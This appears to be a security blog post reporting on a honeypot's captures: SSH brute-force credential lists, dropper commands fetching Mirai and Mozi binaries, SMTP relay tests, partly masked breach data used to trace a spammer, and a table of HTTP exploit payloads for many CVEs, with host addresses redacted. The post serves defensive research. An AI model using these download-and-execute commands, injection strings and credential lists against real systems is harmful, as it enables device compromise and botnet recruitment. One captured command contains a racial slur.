Honeypot Chronicles: Insights into the loot of a honeypot
This blog post presents some findings from one of my honeypots. Unfortunately, I haven’t documented everything that might have been worth sharing over the years, but I've captured some interesting details over the past few weeks. IP addresses and domain names have been removed so you can navigate and copy-pase safely through this post. They can still be traced with a simple Google search.
22 - SSH
Over approximately 14 days, there were 27,840 login attempts, averaging 1.35 attempts per minute.
Top 20 user:password combinations
| Combo | # of attempts |
| support:support | 582 |
| root:0 | 84 |
| admin:admin | 49 |
| root:abcd1234 | 46 |
| root:root | 45 |
| naveen:naveen123 | 29 |
| max:max!123 | 29 |
| user:user | 28 |
| root:admin | 26 |
| naveen:kjashd123sadhj123dhs1SS | 25 |
| oracle:oracle!@#$ | 25 |
| ftpuser:ftpuser | 25 |
| ftpuser:admin | 24 |
| craft:craft!@# | 23 |
| sa:Sa123 | 23 |
| root:123456 | 23 |
| ansuser:Ansuser1 | 22 |
| root:toor | 22 |
| dockeradmin:Dockeradmin1234 | 21 |
| deployer:deployer!123 | 21 |
In my previous honeypots, the top username combinations varied slightly each time. However, this time, the combination "support:suport" was heavily targeted by the same actors, leading to an inflated count. Despite this, the unique combinations remain mostly consistent, though their rankings may differ. You can download the complete password list here.
Most attacks by country
| Country | # of attacks |
EC  | 14595 |
CN  | 7944 |
US  | 1367 |
RU  | 683 |
NL  | 446 |
IN  | 412 |
KR  | 333 |
BG  | 313 |
HK  | 232 |
BR  | 135 |
Equator is an unusual source for such a high volume of login attempts. Actually one IP tried the whole 14595 attempts in a timespan of over 4 hours..
Analyzing the attackers based solely on IP addresses provides a clearer perspective.
Most attackers by country:
| Country | # of attackers |
| CN | 430 |
| US | 190 |
| KR | 170 |
| IN | 143 |
| BR | 82 |
| HK | 76 |
SE  | 68 |
| RU | 62 |
ID  | 52 |
IQ  | 42 |
Interactive Honeypot
My honeypot was configured to allow fake access under certain conditions. So, what happens when an attacker triggers a "valid" login?
Often, nothing significant happens. Some attackers merely perform automatic banner-grabbing after login, while others go further and attempt to execute commands. This behavior could also be influenced by bugs or suspicious activity within my honeypot itself.
admin:admin
system
shell
sh
linuxshell
cd /tmp/; echo "senpai" > rootsenpai; cat rootsenpai; rm -rf rootsenpai
rm -rf boobs.sh; rm -rf miori.*; wget http://bad_actor_address.shop/askljdghreg/boobs.sh || curl -O http://bad_actor_address.shop/askljdghreg/boobs.sh || tftp bad_actor_address.shop/askljdghreg -c get boobs.sh || tftp -g -r boobs.sh bad_actor_address.shop/askljdghreg; chmod 777 boobs.sh;./boobs.sh ssh; rm -rf boobs.sh
boobs.sh
server_ip="bad_actor_address.shop/askljdghreg"
for arch in $binarys
do
wget http://$server_ip/$arch || curl -O $binout http://$server_ip/$arch || tftp $server_ip -c get $arch || tftp -g -r $arch $server_ip
chmod 777 $arch
./$arch ssh
rm -rf $arch
done
bin.x86_64
Ye, it's Mirai Virustotal (23/68). admin:admin
system
shell
sh
linuxshell
sudo su
cd /tmp/; echo "nigger" > fileout; cat fileout; rm -rf fileout
for proc_dir in /proc/[0-9]*; do pid=${proc_dir##*/}; buffer=$(cat "/proc/$pid/maps"); if [ "${#buffer}" -gt 1 ]; then if [ "${buffer#*"/lib/"}" = "$buffer" ] && [ "${buffer#*"/lib64/"}" = "$buffer" ] && [ "${buffer#*"telnetdbot"}" = "$buffer" ]; then kill -9 "$pid"; fi; fi; done
rm -rf ssh.sh; wget http://87.xxx.xxx.xx/ssh.sh || curl -O http://87.xxx.xxx.xx/ssh.sh || tftp 87.xxx.xxx.xx -c get ssh.sh || tftp -g -r ssh.sh 87.xxx.xxx.xx; chmod 777 ssh.sh;./ssh.sh ssh; rm -rf ssh.sh
ssh.sh
server_ip="87.xxx.xxx.xxx"
binout="runmeplz"
rm -rf $binout
for arch in $binarys
do
rm -rf $arch
wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip
chmod 777 $binout
./$binout $1
rm -rf $binout
done
x86
Ye, it's Mirai Virustotal (18/68).25 - SMTP
Port 25 is commonly used for sending and receiving emails, making it a frequent target for spammers scanning for open relays. Typically, they don't immediately send spam but start by sending test emails to one of their own addresses. I've frequently received emails in a consistent format, leading me to believe there's a script or application that checks for open relays. The email addresses used in these tests vary, but this pattern has persisted for over a year.
MAIL FROM:
RCPT TO:
DATA
Message-ID:
From:
To:
Subject: Valid SMTP XXX.XXX.XXX.XXX
Date: Mon, 01 Aug 2024 12:34:56 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="_unique_id"
This is a multi-part message in MIME format.
--*boundary*
Content-Type: text/plain;
charset="utf-8"
Content-Transfer-Encoding: quoted-printable
XXX.XXX.XXX.XXX:25 | no auth | SSL: True | Hostname: =
honeypot.hoster.com
--*boundary*
Content-Type: text/html;
charset="utf-8"
Content-Transfer-Encoding: quoted-printable
XXX.XXX.XXX.XXX:25 | no auth | SSL: True | Hostname: =
honeypot.hoster.com
--*boundary*--
.
Quit
Interestingly, some of the email addresses used for receiving test emails have been in use since atleast 2017.,. Despite this, most of them don't appear in any public records, breaches, or even in Google search results. Occasionally, these addresses are reused for registering with online services like forums, but these accounts typically remain inactive, with no posts or comments.
What happens if you forward one of these emails?
In my experience, the spammer sends test emails to various mail providers (Outlook, Gmail, Yahoo, etc.) primarily to check if the SMTP server can successfully deliver emails to these inboxes.
Do these e-mail addresses get reused?
Yes!
This spammer also used unique usernames, which can be found on social media platforms. These usernames aren't present in any breaches, but they remain inactive or empty anyway.
Lets look at the breaches:
Breach #1 (2015)
| Username | IP | Password | |
|---|---|---|---|
| United Nations Office Nigeria | d****[email protected] |  41.xxx.xxx.104 |
b****2015 |
| United Nations | d****h1@yahoo.com | 41.xxx.xxx.104 |
b****2015 |
Breach #2 (2014)
| Username | IP | Password | |
|---|---|---|---|
| k***o | d****[email protected] | 82.xxx.xxx.156 |
b****2015 |
Social Media accounts
Due to the reuse of the username and email, along with some targeted Google searches and the ability to test email and username combinations on Twitter, I was able to find the spammer's Twitter account, which was created in 2010. The only other account using this username is a TikTok account from 2023. While I can't definitively verify that the TikTok account belongs to the spammer, the uploaded pictures and the reuse of the unique username strongly suggest that it does.80 - HTTP
Several payloads have been stripped down for readability, but the content remains unedited. If a vulnerability was exploited using multiple payloads, I've selected the most interesting one.
Currently, actively exploited vulnerabilities
| CVE | Payload |
| CVE-2023-1389 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2Fxxx.xxx.xxx.xxx%2Ft%7Csh%3B%60) HTTP/1.1 |
| CVE-2023-26801 | POST /goform/set_LimitClient_cfg HTTP/1.1 cookie: user=admin time1=00:00-00:00&time2=00:00-00:00&mac=;killall -9 mpsl; killall -9 bash.mpsl; killall -9 mips; killall -9 tsuki.mpsl; killall -9 skid.mpsl;rm -rf blink; wget http://xxx.xxx.xxx.xxx/blink; chmod 777 blink; ./blink blink; rm -rf blink; |
| CVE-2022-30023 | GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0 |
| CVE-2021-41773, CVE-2021-42013 | POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1 connection: keep-alive content-length: 101 upgrade-insecure-requests: 1 content-type: text/plain host: xxx.xxx.xxx.xxx:80 accept: */* user-agent: Custom-AsyncHttpClient X=$(curl http://xxx.xxx.xxx.xxx/sh || wget http://xxx.xxx.xxx.xxx/sh -O-); echo "$X" | sh -s apache.selfrep |
| CVE2018-10562, 2018-10561 | POST /GponForm/diag_Form?images/ HTTP/1.1 content-length: 118 accept-encoding: gzip, deflate connection: keep-alive user-agent: Hello, World host: 127.0.0.1:80 accept: */* XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://xxx.xxx.xxx.xxx:48333/Mozi.m+-O+->/tmp/gpon80 |
| CVE-2019-18935 | GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 |
| CVE-2021-21972, CVE-2021-21973 | POST /sdk HTTP/1.1 user-agent: Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/) host: xxx.xxx.xxx.xxx connection: close content-length: 441 <soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope> |
| CVE-2017-9841 | GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
content-length: 33 content-type: text/plain upgrade-insecure-requests: 1 connection: keep-alive user-agent: Custom-AsyncHttpClient host: xxx.xxx.xxx.xxx:80 accept: */* <?php echo(md5("Hello PHPUnit")); GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 host: xxx.xxx.xxx.xxx accept-encoding: gzip, deflate connection: keep-alive content-length: 79 user-agent: python-requests/2.32.3 accept: */* <?php system("wget https://pastebin.com/raw/xxxxxx -O XsamXadoo_Bot.php"); ?> |
| Exploit-DB 46150 | GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1 upgrade-insecure-requests: 1 user-agent: Custom-AsyncHttpClient host: xxx.xxx.xxx.xxx:80 connection: keep-alive accept: */* |
| Exploit-DB 25978 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://xxx.xxx.xxx.xxx:45367/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.1 |
| CVE-2021-44228 (Log4Shell) | GET /t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ x-api-version: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ user-agent: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ x-real-ip: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ cookie: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ originating-ip: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ x-forwarded-for: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ referrer: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ bearer: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ Host: xxx.xxx.xxx.xxx:8080 x-client-ip: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ x-forwarded-host: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ accept: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ connection: close authentication: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ x-druid-comment: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ cf-connecting_ip: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ x-requested-with: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ |
| CVE-2024-32113 | POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1 host: xxx.xxx.xxx.xxx:80 content-length: 147 user-agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0 content-type: application/x-www-form-urlencoded upgrade-insecure-requests: 1 connection: keep-alive accept: */* groovyProgram=throw+new+Exception('curl http://xxx.xxx.xxx.xxx/sh | sh -s elf || wget -O- http://xxx.xxx.xxx.xxx/sh | sh -s elf'.execute().text); |
| CVE-2019-9670 | POST /Autodiscover/Autodiscover.xml HTTP/1.1 host: xxx.xxx.xxx.xxx:8080 content-length: 314 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 content-type: application/xml accept-encoding: gzip connection: close <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> <Request> <EMailAddress>aaaaa</EMailAddress> <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema> </Request> </Autodiscover> |
| Vacron NVR RCE | GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://xxx.xxx.xxx.xxx:53035/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron HTTP/1.0 |
| CVE-2015-2051 | POST /HNAP1/ HTTP/1.0 content-length: 640 host: xxx.xxx.xxx.xxx:80 soapaction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://xxx.xxx.xxx.xxx:40194/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` content-type: text/xml; charset="utf-8" <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Currently Exploited Vulnerable Configurations
| Description | Payload |
| Start a debugging session with Phpstorm | GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 |
| misconfiguration scenario where an administrator sets up a Cisco router with the HTTP admin interface enabled, but without password protection | GET /level/15/exec/-/sh/run/CR HTTP/1.1 |
| search for PhpMyAdmin-panels | GET /phpMyAdmin/scripts/setup.php HTTP/1.0 GET http://xxx.xxx.xxx.xxx:8080/phpMyAdmin/scripts/setup.php HTTP/1.0 GET http://xxx.xxx.xxx.xxx:8080/phpmyadmin/scripts/setup.php HTTP/1.0 GET http://xxx.xxx.xxx.xxx:8080/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0 |
| GET /actuator/gateway/routes HTTP/1.1 | Search for activated Spring Actuator API |
| Search for Open HTTP proxies | CONNECT example.com:443 HTTP/1.1 user-agent: Go-http-client/1.1 host: example.com:443 |
| Unknown Datafrog package | GET / HTTP/1.1 host: xxx.xxx.xxx.xxx accept-encoding: gzip, deflate connection: keep-alive user-agent: python-requests/2.32.2 x-datadog-trace-id: <random integer> accept: */* x-datadog-parent-id: <random integer> x-datadog-sampling-priority: 1 |
Analysis of various payloads
While most binaries are boring Mirai samples, with the occasional interesting IRC bot (yes, they still exist!) that allows you to chat with the bot operator, some shell scripts contained somewhat intriguing content.
Advertisement for the Attackers' DDoS Service
